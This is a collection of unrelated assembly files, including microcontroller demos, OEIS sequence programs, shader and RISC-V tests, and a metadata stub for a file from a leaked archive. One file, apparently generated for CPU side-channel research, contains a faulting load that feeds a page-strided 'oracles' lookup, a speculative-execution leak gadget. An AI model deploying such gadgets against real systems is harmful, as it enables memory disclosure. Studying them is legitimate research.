TheStack | 31cc1d116ce1c6fe14cdf31728c7e094e861b750 | Assemblycode:Assembly | {"size": 3119, "ext": "asm", "max_stars_repo_path": "apps/breakfast/pde_fw/toast/examples/Assembly (CCE)/msp430x24x_uscia0_spi_02.asm", "max_stars_repo_name": "tp-freeforall/breakfast", "max_stars_repo_stars_event_min_datetime": "2020-05-15T18:08:48.000Z", "max_stars_repo_stars_event_max_datetime": "2020-05-15T18:08:48.000Z", "max_issues_repo_path": "apps/breakfast/toast/msp430-code-examples/Assembly (CCE)/msp430x24x_uscia0_spi_02.asm", "max_issues_repo_name": "tp-freeforall/breakfast", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "apps/breakfast/toast/msp430-code-examples/Assembly (CCE)/msp430x24x_uscia0_spi_02.asm", "max_forks_repo_name": "tp-freeforall/breakfast", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 1, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 48.734375, "max_line_length": 81, "alphanum_fraction": 0.3318371273} | ;*******************************************************************************
; MSP430x24x Demo - USCI_A0, SPI Interface to HC165 Shift Register
;
; Description: This program demonstrate a USCI_A0 in SPI mode interface to a
; an 'HC165 shift register. Read 8-bit Data from H-A into Data.
; ACLK = n/a, MCLK = SMCLK = default DCO ~1.045MHz, BRCLK = SMCLK/2
;
; MSP430x24x
; -----------------
; /|\| XIN|-
; | | |
; HC165 --|RST XOUT|-
; ---------- | |
; 8 | /LD|<---|P3.6 |
; -\->|A-H CLK|<---|P3.0/UCA0CLK |
; |-|INH QH|--->|P3.5/UCA0SOMI |
; |-|SER | | |
; v
;
;
; JL Bile
; Texas Instruments Inc.
; May 2008
; Built Code Composer Essentials: v3 FET
;*******************************************************************************
.cdecls C,LIST, "msp430x24x.h"
Data .equ 0200h
;-------------------------------------------------------------------------------
.text ;Program Start
;-------------------------------------------------------------------------------
RESET mov.w #0500h,SP ; Initialize stackpointer
StopWDT mov.w #WDTPW+WDTHOLD,&WDTCTL ; Stop watchdog timer
SetupP3 bis.b #021h,&P3SEL ; P3.0,5 USCI_A0 option select
bis.b #040h,&P3DIR ; P3.6 output direction
SetupSPI bis.b #UCCKPH+UCMSB+UCMST+UCSYNC,&UCA0CTL0 ; 3-pin, 8-bit SPI mast
bis.b #UCSSEL_2,&UCA0CTL1 ; SMCLK
bis.b #02h,&UCA0BR0
clr.b &UCA0BR1 ;
clr.b &UCA0MCTL
bic.b #UCSWRST,&UCA0CTL1 ; **Initialize USCI state machine**
;
Mainloop call #RX_HC165 ; Load HC165 value into Rx buffer
mov.b &UCA0RXBUF,&Data ; Move value into Data
jmp Mainloop ; Repeat
;
;-------------------------------------------------------------------------------
RX_HC165
;-------------------------------------------------------------------------------
bic.b #040h,&P3OUT ; Trigger low edge on HC165 /LD
bis.b #040h,&P3OUT ; Return /LD to high
bic.b #UCA0RXIFG,&IFG2 ; Clear U1RXBUF flag
mov.b #00h,&UCA0TXBUF ; Dummy write to start SPI
L1 bit.b #UCA0RXIFG,&IFG2 ; RXBUF ready?
jnc L1 ; 1 = ready
ret ;
;
;-------------------------------------------------------------------------------
; Interrupt Vectors
;-------------------------------------------------------------------------------
.sect ".reset" ; POR, ext. Reset
.short RESET
.end
|
||||
TheStack | a891d7984350cd3af6cd91b3560226e3276478d1 | Assemblycode:Assembly | {"size": 546, "ext": "asm", "max_stars_repo_path": "programs/oeis/213/A213840.asm", "max_stars_repo_name": "jmorken/loda", "max_stars_repo_stars_event_min_datetime": "2021-03-15T11:38:20.000Z", "max_stars_repo_stars_event_max_datetime": "2021-03-15T11:38:20.000Z", "max_issues_repo_path": "programs/oeis/213/A213840.asm", "max_issues_repo_name": "jmorken/loda", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "programs/oeis/213/A213840.asm", "max_forks_repo_name": "jmorken/loda", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 1, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 20.2222222222, "max_line_length": 223, "alphanum_fraction": 0.6062271062} | ; A213840: a(n) = n*(1 + n)*(3 - 4*n + 4*n^2)/6.
; 1,11,54,170,415,861,1596,2724,4365,6655,9746,13806,19019,25585,33720,43656,55641,69939,86830,106610,129591,156101,186484,221100,260325,304551,354186,409654,471395,539865,615536,698896,790449,890715,1000230,1119546,1249231
mov $13,$0
mov $15,$0
add $15,1
lpb $15
clr $0,13
mov $0,$13
sub $15,1
sub $0,$15
mov $12,$0
add $12,1
lpb $12
mov $0,$10
sub $12,1
sub $0,$12
pow $0,2
mov $1,8
mul $1,$0
add $1,1
add $11,$1
lpe
add $14,$11
lpe
mov $1,$14
|
||||
TheStack | 860157fabdcc2966eccc271862415994e93ea428 | Assemblycode:Assembly | {"size": 441, "ext": "asm", "max_stars_repo_path": "oeis/028/A028201.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/028/A028201.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/028/A028201.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 24.5, "max_line_length": 184, "alphanum_fraction": 0.6916099773} | ; A028201: Expansion of 1/((1-6x)(1-7x)(1-8x)(1-10x)).
; Submitted by Jon Maiga
; 1,31,605,9515,131901,1684011,20303725,234831355,2632942301,28828462091,309891463245,3283433875995,34394321024701,357022927273771,3679144385477165,37693176577349435,384361331408659101
mov $1,1
mov $2,$0
mov $3,$0
lpb $2
mov $0,$3
sub $2,1
sub $0,$2
seq $0,20838 ; Expansion of 1/((1-7x)(1-8x)(1-10x)).
sub $0,$1
mul $1,7
add $1,$0
lpe
mov $0,$1
|
||||
TheStack | 9bf92971e8978288b570245d8220ef8e8461ad58 | Assemblycode:Assembly | {"size": 7839, "ext": "asm", "max_stars_repo_path": "Transynther/x86/_processed/AVXALIGN/_st_4k_sm_/i7-7700_9_0x48_notsx.log_1_907.asm", "max_stars_repo_name": "ljhsiun2/medusa", "max_stars_repo_stars_event_min_datetime": "2020-08-13T19:41:58.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T12:22:51.000Z", "max_issues_repo_path": "Transynther/x86/_processed/AVXALIGN/_st_4k_sm_/i7-7700_9_0x48_notsx.log_1_907.asm", "max_issues_repo_name": "ljhsiun2/medusa", "max_issues_repo_issues_event_min_datetime": "2021-04-29T06:29:35.000Z", "max_issues_repo_issues_event_max_datetime": "2021-05-13T21:02:30.000Z", "max_forks_repo_path": "Transynther/x86/_processed/AVXALIGN/_st_4k_sm_/i7-7700_9_0x48_notsx.log_1_907.asm", "max_forks_repo_name": "ljhsiun2/medusa", "max_forks_repo_forks_event_min_datetime": "2020-07-14T17:07:07.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-21T01:12:22.000Z"} | {"max_stars_count": 9, "max_issues_count": 1, "max_forks_count": 3, "avg_line_length": 20.1516709512, "max_line_length": 153, "alphanum_fraction": 0.6468937364} | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r14
push %r15
push %rax
push %rcx
push %rdi
push %rsi
lea addresses_A_ht+0x12498, %rcx
clflush (%rcx)
sub %r12, %r12
mov $0x6162636465666768, %rax
movq %rax, (%rcx)
nop
nop
nop
nop
nop
xor $26611, %rcx
lea addresses_normal_ht+0x168f8, %rsi
lea addresses_A_ht+0x16a98, %rdi
add $64153, %rax
mov $123, %rcx
rep movsl
xor $4041, %rcx
lea addresses_D_ht+0xf748, %r10
nop
nop
nop
sub %r14, %r14
mov (%r10), %rsi
nop
nop
and %rsi, %rsi
lea addresses_UC_ht+0x1acf3, %rsi
lea addresses_D_ht+0x23e, %rdi
nop
and %r15, %r15
mov $48, %rcx
rep movsq
nop
nop
nop
nop
cmp %rcx, %rcx
lea addresses_D_ht+0x1608c, %r14
nop
nop
nop
nop
xor $57126, %r15
mov $0x6162636465666768, %r12
movq %r12, %xmm6
movups %xmm6, (%r14)
cmp $6516, %rdi
lea addresses_D_ht+0x18618, %r15
nop
nop
nop
nop
nop
sub %rsi, %rsi
movb (%r15), %cl
nop
nop
nop
nop
and %r14, %r14
lea addresses_WT_ht+0x14880, %r15
nop
nop
nop
nop
lfence
mov $0x6162636465666768, %rax
movq %rax, (%r15)
nop
nop
nop
nop
and $41085, %rsi
lea addresses_UC_ht+0x16498, %r12
nop
nop
cmp $2646, %r14
movw $0x6162, (%r12)
nop
cmp $2237, %rax
lea addresses_D_ht+0x1e698, %rax
nop
nop
inc %r12
vmovups (%rax), %ymm1
vextracti128 $1, %ymm1, %xmm1
vpextrq $0, %xmm1, %r14
nop
nop
nop
nop
cmp %rcx, %rcx
lea addresses_normal_ht+0x4298, %rsi
lea addresses_UC_ht+0x6f98, %rdi
nop
nop
nop
nop
and %r10, %r10
mov $86, %rcx
rep movsl
nop
nop
nop
nop
xor $25862, %rsi
lea addresses_normal_ht+0x9498, %rsi
lea addresses_WC_ht+0x14a98, %rdi
nop
nop
nop
nop
and $58993, %r12
mov $54, %rcx
rep movsb
nop
xor %rsi, %rsi
lea addresses_WT_ht+0x7b98, %r10
nop
nop
and %rax, %rax
mov $0x6162636465666768, %rsi
movq %rsi, %xmm0
movups %xmm0, (%r10)
nop
nop
nop
nop
nop
sub $42020, %r15
lea addresses_WC_ht+0x2a98, %r15
nop
nop
nop
nop
nop
add $7288, %r14
mov $0x6162636465666768, %rsi
movq %rsi, %xmm5
and $0xffffffffffffffc0, %r15
vmovaps %ymm5, (%r15)
nop
nop
mfence
lea addresses_A_ht+0x9e98, %r14
nop
nop
nop
nop
nop
cmp %rax, %rax
vmovups (%r14), %ymm4
vextracti128 $1, %ymm4, %xmm4
vpextrq $1, %xmm4, %r15
nop
nop
nop
nop
nop
cmp %rdi, %rdi
pop %rsi
pop %rdi
pop %rcx
pop %rax
pop %r15
pop %r14
pop %r12
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r13
push %r8
push %r9
push %rcx
push %rdi
push %rsi
// REPMOV
lea addresses_UC+0x1cf4e, %rsi
lea addresses_A+0xc718, %rdi
sub %r9, %r9
mov $22, %rcx
rep movsq
nop
nop
nop
nop
add %r13, %r13
// Store
lea addresses_WC+0x96c4, %r8
nop
nop
cmp $45983, %r12
movl $0x51525354, (%r8)
nop
nop
nop
cmp $53272, %rdi
// Store
lea addresses_PSE+0xc298, %r9
nop
nop
nop
xor $37993, %rdi
mov $0x5152535455565758, %r13
movq %r13, (%r9)
nop
nop
add %rsi, %rsi
// Store
lea addresses_D+0x2298, %r8
nop
nop
nop
dec %r13
movb $0x51, (%r8)
xor %r8, %r8
// Store
lea addresses_PSE+0x1f898, %r12
nop
nop
nop
cmp %r13, %r13
mov $0x5152535455565758, %rdi
movq %rdi, %xmm0
vmovups %ymm0, (%r12)
inc %r9
// Store
lea addresses_A+0x8368, %r8
nop
nop
nop
nop
nop
sub %r12, %r12
movl $0x51525354, (%r8)
nop
nop
nop
nop
add %r12, %r12
// Store
lea addresses_WC+0x10898, %rdi
nop
nop
nop
cmp $41290, %r8
mov $0x5152535455565758, %rsi
movq %rsi, %xmm7
vmovups %ymm7, (%rdi)
and $50626, %r13
// Store
lea addresses_D+0x3a98, %r8
sub $17641, %r12
mov $0x5152535455565758, %r9
movq %r9, %xmm0
movups %xmm0, (%r8)
nop
nop
nop
nop
cmp %rsi, %rsi
// Store
lea addresses_D+0x1e5b8, %rsi
nop
nop
nop
sub $7484, %rcx
mov $0x5152535455565758, %r12
movq %r12, %xmm0
vmovntdq %ymm0, (%rsi)
nop
nop
nop
nop
add %r8, %r8
// Store
lea addresses_UC+0x17d56, %r8
nop
nop
add $39930, %rcx
movl $0x51525354, (%r8)
nop
nop
sub %rcx, %rcx
// Store
lea addresses_RW+0x14218, %r12
nop
nop
nop
xor $32288, %rcx
mov $0x5152535455565758, %rdi
movq %rdi, %xmm0
movups %xmm0, (%r12)
nop
and %r13, %r13
// Store
lea addresses_UC+0xea98, %r13
nop
nop
nop
nop
nop
and $18550, %rcx
mov $0x5152535455565758, %rsi
movq %rsi, (%r13)
cmp %rdi, %rdi
// Faulty Load
lea addresses_D+0x2298, %r9
nop
nop
nop
cmp $37800, %r12
mov (%r9), %r13d
lea oracles, %rsi
and $0xff, %r13
shlq $12, %r13
mov (%rsi,%r13,1), %r13
pop %rsi
pop %rdi
pop %rcx
pop %r9
pop %r8
pop %r13
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'same': False, 'NT': False, 'AVXalign': False, 'size': 4, 'type': 'addresses_D', 'congruent': 0}}
{'dst': {'same': False, 'congruent': 7, 'type': 'addresses_A'}, 'OP': 'REPM', 'src': {'same': False, 'congruent': 1, 'type': 'addresses_UC'}}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 4, 'type': 'addresses_WC', 'congruent': 1}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 8, 'type': 'addresses_PSE', 'congruent': 9}, 'OP': 'STOR'}
{'dst': {'same': True, 'NT': True, 'AVXalign': False, 'size': 1, 'type': 'addresses_D', 'congruent': 0}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 32, 'type': 'addresses_PSE', 'congruent': 9}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 4, 'type': 'addresses_A', 'congruent': 4}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 32, 'type': 'addresses_WC', 'congruent': 8}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 16, 'type': 'addresses_D', 'congruent': 10}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': True, 'AVXalign': False, 'size': 32, 'type': 'addresses_D', 'congruent': 5}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': True, 'size': 4, 'type': 'addresses_UC', 'congruent': 0}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 16, 'type': 'addresses_RW', 'congruent': 6}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 8, 'type': 'addresses_UC', 'congruent': 11}, 'OP': 'STOR'}
[Faulty Load]
{'OP': 'LOAD', 'src': {'same': True, 'NT': False, 'AVXalign': True, 'size': 4, 'type': 'addresses_D', 'congruent': 0}}
<gen_prepare_buffer>
{'dst': {'same': False, 'NT': False, 'AVXalign': True, 'size': 8, 'type': 'addresses_A_ht', 'congruent': 7}, 'OP': 'STOR'}
{'dst': {'same': False, 'congruent': 9, 'type': 'addresses_A_ht'}, 'OP': 'REPM', 'src': {'same': False, 'congruent': 3, 'type': 'addresses_normal_ht'}}
{'OP': 'LOAD', 'src': {'same': False, 'NT': True, 'AVXalign': False, 'size': 8, 'type': 'addresses_D_ht', 'congruent': 4}}
{'dst': {'same': False, 'congruent': 1, 'type': 'addresses_D_ht'}, 'OP': 'REPM', 'src': {'same': False, 'congruent': 0, 'type': 'addresses_UC_ht'}}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 16, 'type': 'addresses_D_ht', 'congruent': 2}, 'OP': 'STOR'}
{'OP': 'LOAD', 'src': {'same': False, 'NT': False, 'AVXalign': False, 'size': 1, 'type': 'addresses_D_ht', 'congruent': 6}}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 8, 'type': 'addresses_WT_ht', 'congruent': 3}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 2, 'type': 'addresses_UC_ht', 'congruent': 8}, 'OP': 'STOR'}
{'OP': 'LOAD', 'src': {'same': False, 'NT': False, 'AVXalign': False, 'size': 32, 'type': 'addresses_D_ht', 'congruent': 9}}
{'dst': {'same': False, 'congruent': 8, 'type': 'addresses_UC_ht'}, 'OP': 'REPM', 'src': {'same': False, 'congruent': 10, 'type': 'addresses_normal_ht'}}
{'dst': {'same': False, 'congruent': 11, 'type': 'addresses_WC_ht'}, 'OP': 'REPM', 'src': {'same': True, 'congruent': 8, 'type': 'addresses_normal_ht'}}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 16, 'type': 'addresses_WT_ht', 'congruent': 8}, 'OP': 'STOR'}
{'dst': {'same': False, 'NT': False, 'AVXalign': True, 'size': 32, 'type': 'addresses_WC_ht', 'congruent': 9}, 'OP': 'STOR'}
{'OP': 'LOAD', 'src': {'same': False, 'NT': False, 'AVXalign': False, 'size': 32, 'type': 'addresses_A_ht', 'congruent': 9}}
{'51': 1}
51
*/
|
||||
TheStack | a106ed9a4ed3ddfe35c2960957015026163df6fd | Assemblycode:Assembly | {"size": 143, "ext": "asm", "max_stars_repo_path": "other.7z/NEWS.7z/NEWS/テープリストア/NEWS_05/NEWS_05.tar/home/kimura/kart/risc.lzh/risc/join/Pause.asm", "max_stars_repo_name": "prismotizm/gigaleak", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "other.7z/NEWS.7z/NEWS/テープリストア/NEWS_05/NEWS_05.tar/home/kimura/kart/risc.lzh/risc/join/Pause.asm", "max_issues_repo_name": "prismotizm/gigaleak", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "other.7z/NEWS.7z/NEWS/テープリストア/NEWS_05/NEWS_05.tar/home/kimura/kart/risc.lzh/risc/join/Pause.asm", "max_forks_repo_name": "prismotizm/gigaleak", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 20.4285714286, "max_line_length": 47, "alphanum_fraction": 0.8111888112} | Name: Pause.asm
Type: file
Size: 43998
Last-Modified: '1992-11-18T01:48:24Z'
SHA-1: 5EF37873932D83415B1BC750E16A6AE0DE882E18
Description: null
|
||||
TheStack | 360614eb9d9cd633135106db1db725baf1f56e83 | Assemblycode:Assembly | {"size": 955, "ext": "asm", "max_stars_repo_path": "kern/i686/fpu/fpu.asm", "max_stars_repo_name": "greck2908/LudOS", "max_stars_repo_stars_event_min_datetime": "2018-01-28T20:07:48.000Z", "max_stars_repo_stars_event_max_datetime": "2022-02-11T22:58:49.000Z", "max_issues_repo_path": "kern/i686/fpu/fpu.asm", "max_issues_repo_name": "greck2908/LudOS", "max_issues_repo_issues_event_min_datetime": "2017-09-12T15:38:16.000Z", "max_issues_repo_issues_event_max_datetime": "2017-11-05T12:19:01.000Z", "max_forks_repo_path": "kern/i686/fpu/fpu.asm", "max_forks_repo_name": "greck2908/LudOS", "max_forks_repo_forks_event_min_datetime": "2018-08-17T13:30:57.000Z", "max_forks_repo_forks_event_max_datetime": "2021-06-25T16:56:12.000Z"} | {"max_stars_count": 44, "max_issues_count": 2, "max_forks_count": 8, "avg_line_length": 25.8108108108, "max_line_length": 107, "alphanum_fraction": 0.5486910995} | global check_fpu_presence
global setup_fpu
check_fpu_presence:
MOV EDX, CR0 ; Start probe, get CR0
MOV CR0, EDX ; store control word
FNINIT ; load defaults to FPU
FNSTSW [.testword] ; store status word
CMP word [.testword], 0 ; compare the written status with the expected FPU state
JNE .nofpu ; jump if the FPU hasn't written anything (i.e. it's not there)
JMP .hasfpu
.nofpu:
mov eax, 0 ;false
ret
.hasfpu:
mov eax, 1 ;true
ret
.testword: DW 0x55AA ; store garbage to be able to detect a change
setup_fpu:
clts
mov edx, cr0
or edx, 0010_0010b
and edx, 0xFFFFFFF3
mov cr0, edx
mov edx, cr4
or edx, 0000_0000_0110_0000_0000b ; Check SSE first ! causes #GPF otherwise
mov cr4, edx
fninit
ret
|
||||
TheStack | 806353de0aa5eeedcb8012283dfeeedf84e71bbe | Assemblycode:Assembly | {"size": 627, "ext": "asm", "max_stars_repo_path": "libsrc/rex/syscall1p.asm", "max_stars_repo_name": "meesokim/z88dk", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "libsrc/rex/syscall1p.asm", "max_issues_repo_name": "meesokim/z88dk", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "libsrc/rex/syscall1p.asm", "max_forks_repo_name": "meesokim/z88dk", "max_forks_repo_forks_event_min_datetime": "2019-12-03T23:57:48.000Z", "max_forks_repo_forks_event_max_datetime": "2019-12-03T23:57:48.000Z"} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": 1, "avg_line_length": 18.4411764706, "max_line_length": 67, "alphanum_fraction": 0.5295055821} | ;
; System Call for REX6000
;
; I've never tested this function, hope it works. Daniel
;
; $Id: syscall1p.asm,v 1.4 2015/01/19 01:33:06 pauloscustodio Exp $
PUBLIC syscall1p
.syscall1p
pop bc
pop de ;parameter
pop hl ;call number
push hl
push de
push bc
ld ($c000),hl
ld ($c002),de
ld a,h
ld hl,0
and a,$e0 ; compare if points to $8000-$9FFF
add a,$80
jp Z, syscall1p_1
in a,(1) ; load mem page of addin code
ld l,a
.syscall1p_1
ld ($c004),hl ;par 2
rst $10
ld hl,($c00e)
ret
|
||||
TheStack | 4f64a903fe0f5daf5151583a3a9d9554562f49a1 | Assemblycode:Assembly | {"size": 5875, "ext": "asm", "max_stars_repo_path": "coverage/IN_CTS/0534-COVERAGE-value-lattice-h-280/work/variant/1_spirv_asm/shader.frag.asm", "max_stars_repo_name": "asuonpaa/ShaderTests", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "coverage/IN_CTS/0534-COVERAGE-value-lattice-h-280/work/variant/1_spirv_asm/shader.frag.asm", "max_issues_repo_name": "asuonpaa/ShaderTests", "max_issues_repo_issues_event_min_datetime": "2021-03-11T07:42:51.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-14T06:30:14.000Z", "max_forks_repo_path": "coverage/IN_CTS/0534-COVERAGE-value-lattice-h-280/work/variant/1_spirv_asm/shader.frag.asm", "max_forks_repo_name": "asuonpaa/ShaderTests", "max_forks_repo_forks_event_min_datetime": "2021-03-09T13:37:19.000Z", "max_forks_repo_forks_event_max_datetime": "2022-02-25T07:32:11.000Z"} | {"max_stars_count": null, "max_issues_count": 47, "max_forks_count": 4, "avg_line_length": 33.9595375723, "max_line_length": 59, "alphanum_fraction": 0.4670638298} | ; SPIR-V
; Version: 1.0
; Generator: Khronos Glslang Reference Front End; 10
; Bound: 113
; Schema: 0
OpCapability Shader
%1 = OpExtInstImport "GLSL.std.450"
OpMemoryModel Logical GLSL450
OpEntryPoint Fragment %4 "main" %94
OpExecutionMode %4 OriginUpperLeft
OpSource ESSL 320
OpName %4 "main"
OpName %8 "a"
OpName %12 "buf0"
OpMemberName %12 0 "_GLF_uniform_int_values"
OpName %14 ""
OpName %20 "b"
OpName %35 "i"
OpName %65 "indexable"
OpName %94 "_GLF_color"
OpDecorate %11 ArrayStride 16
OpMemberDecorate %12 0 Offset 0
OpDecorate %12 Block
OpDecorate %14 DescriptorSet 0
OpDecorate %14 Binding 0
OpDecorate %94 Location 0
%2 = OpTypeVoid
%3 = OpTypeFunction %2
%6 = OpTypeInt 32 1
%7 = OpTypePointer Function %6
%9 = OpTypeInt 32 0
%10 = OpConstant %9 6
%11 = OpTypeArray %6 %10
%12 = OpTypeStruct %11
%13 = OpTypePointer Uniform %12
%14 = OpVariable %13 Uniform
%15 = OpConstant %6 0
%16 = OpConstant %6 1
%17 = OpTypePointer Uniform %6
%31 = OpTypeBool
%45 = OpConstant %6 2
%48 = OpConstant %6 3
%51 = OpConstant %6 4
%54 = OpConstant %6 5
%59 = OpConstant %9 5
%60 = OpTypeArray %6 %59
%64 = OpTypePointer Function %60
%91 = OpTypeFloat 32
%92 = OpTypeVector %91 4
%93 = OpTypePointer Output %92
%94 = OpVariable %93 Output
%4 = OpFunction %2 None %3
%5 = OpLabel
%8 = OpVariable %7 Function
%20 = OpVariable %7 Function
%35 = OpVariable %7 Function
%65 = OpVariable %64 Function
%18 = OpAccessChain %17 %14 %15 %16
%19 = OpLoad %6 %18
OpStore %8 %19
%21 = OpAccessChain %17 %14 %15 %16
%22 = OpLoad %6 %21
OpStore %20 %22
OpBranch %23
%23 = OpLabel
OpLoopMerge %25 %26 None
OpBranch %27
%27 = OpLabel
%28 = OpLoad %6 %20
%29 = OpAccessChain %17 %14 %15 %16
%30 = OpLoad %6 %29
%32 = OpSGreaterThanEqual %31 %28 %30
OpBranchConditional %32 %24 %25
%24 = OpLabel
%33 = OpLoad %6 %20
%34 = OpISub %6 %33 %16
OpStore %20 %34
%36 = OpAccessChain %17 %14 %15 %16
%37 = OpLoad %6 %36
OpStore %35 %37
OpBranch %38
%38 = OpLabel
OpLoopMerge %40 %41 None
OpBranch %42
%42 = OpLabel
%43 = OpLoad %6 %35
%44 = OpINotEqual %31 %43 %15
OpBranchConditional %44 %39 %40
%39 = OpLabel
%46 = OpAccessChain %17 %14 %15 %45
%47 = OpLoad %6 %46
%49 = OpAccessChain %17 %14 %15 %48
%50 = OpLoad %6 %49
%52 = OpAccessChain %17 %14 %15 %51
%53 = OpLoad %6 %52
%55 = OpAccessChain %17 %14 %15 %54
%56 = OpLoad %6 %55
%57 = OpAccessChain %17 %14 %15 %16
%58 = OpLoad %6 %57
%61 = OpCompositeConstruct %60 %47 %50 %53 %56 %58
%62 = OpLoad %6 %20
%63 = OpISub %6 %62 %16
OpStore %20 %63
OpStore %65 %61
%66 = OpAccessChain %7 %65 %62
%67 = OpLoad %6 %66
OpStore %8 %67
OpBranch %41
%41 = OpLabel
%68 = OpLoad %6 %35
%69 = OpISub %6 %68 %16
OpStore %35 %69
OpBranch %38
%40 = OpLabel
%70 = OpLoad %6 %8
%71 = OpAccessChain %17 %14 %15 %16
%72 = OpLoad %6 %71
%73 = OpSGreaterThan %31 %70 %72
OpSelectionMerge %75 None
OpBranchConditional %73 %74 %75
%74 = OpLabel
%76 = OpLoad %6 %20
%77 = OpIAdd %6 %76 %16
OpStore %20 %77
OpBranch %75
%75 = OpLabel
OpBranch %26
%26 = OpLabel
OpBranch %23
%25 = OpLabel
%78 = OpLoad %6 %8
%79 = OpAccessChain %17 %14 %15 %45
%80 = OpLoad %6 %79
%81 = OpIEqual %31 %78 %80
OpSelectionMerge %83 None
OpBranchConditional %81 %82 %83
%82 = OpLabel
%84 = OpLoad %6 %20
%85 = OpAccessChain %17 %14 %15 %15
%86 = OpLoad %6 %85
%87 = OpIEqual %31 %84 %86
OpBranch %83
%83 = OpLabel
%88 = OpPhi %31 %81 %25 %87 %82
OpSelectionMerge %90 None
OpBranchConditional %88 %89 %108
%89 = OpLabel
%95 = OpAccessChain %17 %14 %15 %16
%96 = OpLoad %6 %95
%97 = OpConvertSToF %91 %96
%98 = OpAccessChain %17 %14 %15 %15
%99 = OpLoad %6 %98
%100 = OpConvertSToF %91 %99
%101 = OpAccessChain %17 %14 %15 %15
%102 = OpLoad %6 %101
%103 = OpConvertSToF %91 %102
%104 = OpAccessChain %17 %14 %15 %16
%105 = OpLoad %6 %104
%106 = OpConvertSToF %91 %105
%107 = OpCompositeConstruct %92 %97 %100 %103 %106
OpStore %94 %107
OpBranch %90
%108 = OpLabel
%109 = OpAccessChain %17 %14 %15 %15
%110 = OpLoad %6 %109
%111 = OpConvertSToF %91 %110
%112 = OpCompositeConstruct %92 %111 %111 %111 %111
OpStore %94 %112
OpBranch %90
%90 = OpLabel
OpReturn
OpFunctionEnd
|
||||
TheStack | 8021d72fbce21ed71fe36958ced7fc33d93d830e | Assemblycode:Assembly | {"size": 695, "ext": "asm", "max_stars_repo_path": "Modelsim_codes/riscv32_forwarding_sim2_modified.asm", "max_stars_repo_name": "Chen-yu-Zheng/2021SpringCOE-WHU", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "Modelsim_codes/riscv32_forwarding_sim2_modified.asm", "max_issues_repo_name": "Chen-yu-Zheng/2021SpringCOE-WHU", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "Modelsim_codes/riscv32_forwarding_sim2_modified.asm", "max_forks_repo_name": "Chen-yu-Zheng/2021SpringCOE-WHU", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 31.5909090909, "max_line_length": 64, "alphanum_fraction": 0.5726618705} | # Test the RISC-V processor in simulation
# 已经能正确执行:addi, add, lw, sw, beq, jalr
# 待验证:能否正确处理转发:MEM-->EX, WB-->EX, WB-->MEM, MEM-->ID
main: addi x5, x0, 1
addi x6, x0, 2
add x7, x5, x6 #EX rs1 from WB, rs2 from MEM, x7 = 3
add x8, x7, x6 #EX rs1 from MEM, rs2 from WB, x8 = 5
sw x8, 0(x0) #MEM write data from WB's arith op, mem[0] = 5
lw x9, 0(x0)
sw x9, 4(x0) #MEM write data from WB's load, mem[4] = 5
